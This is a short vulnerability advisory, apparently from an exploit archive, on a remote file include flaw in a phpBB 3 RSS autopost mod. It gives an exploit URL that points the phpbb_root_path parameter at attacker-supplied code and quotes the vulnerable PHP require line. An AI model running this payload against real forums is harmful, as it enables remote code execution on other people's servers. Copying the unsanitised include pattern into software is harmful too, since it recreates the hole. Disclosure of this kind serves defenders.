phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability
2009-02-20 16:45:08phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability
Vulnerability author: Kacper
Greetz: all DEVIL TEAM forum members.
Author Website: http://devilteam.pl/
http://polskihacking.pl/
Mod Description:
This mod automatically post content from RSS feed into destination forum.
MOD Download: http://phpbb3.smika.net/
Demo: http://phpbb3.smika.net
dont work when php5 or newest.
Vulnerability:
http://site.cz/forum_path/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=[evil_code]
------------------------------------------------------------------
Bad codE:
includes/functions_lastrss_autopost.php - line 204 - 240:
[code]
if($config['lastrss_ap_enabled']) <-----{1}
{
// init & setup lastrss
// $rss can be already initiated by lastRSS agregator mod by SmiX
if(!isset($rss)) <-----{2}
{
require $phpbb_root_path . 'includes/class_lastrss.' . $phpEx; <-----{3}
$rss = new lastrss;
}
// init/change settings for lastrss autopost bot
$rss->cache_time = 0; // not used in this mod
$rss->items_limit = $config['lastrss_ap_items_limit']; // default limit of items to post
$rss->type = $config['lastrss_type']; // connection type (fopen / curl)
// init lastRSS autopost MOD !
// check if we have some feeds in database to check
$sql = 'SELECT *
FROM ' . LASTRSS_AP_TABLE . '
WHERE next_check < "' . time() . '" AND enabled = "1"';
$result = $db->sql_query($sql);
$row = $db->sql_fetchrow($result);
$db->sql_freeresult($result);
// so do we have some feeds to post ?
if(sizeof($row) > 0)
{
// we are already sure, that at least one feed exists!
$feed = get_next_feed_to_post();
}
// do we have some feed data ?
if (isset($feed) && (sizeof($feed) > 0))
{
// we are sure, we have feed info for checking the feed!
autopost_init($feed);
}
}
?>
[/code]
------------------------------------------------------------------
Zapraszam na forum DEVIL TEAM,
google:"DEVIL TEAM" lub http://6189.pl, http://devilteam.pl
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.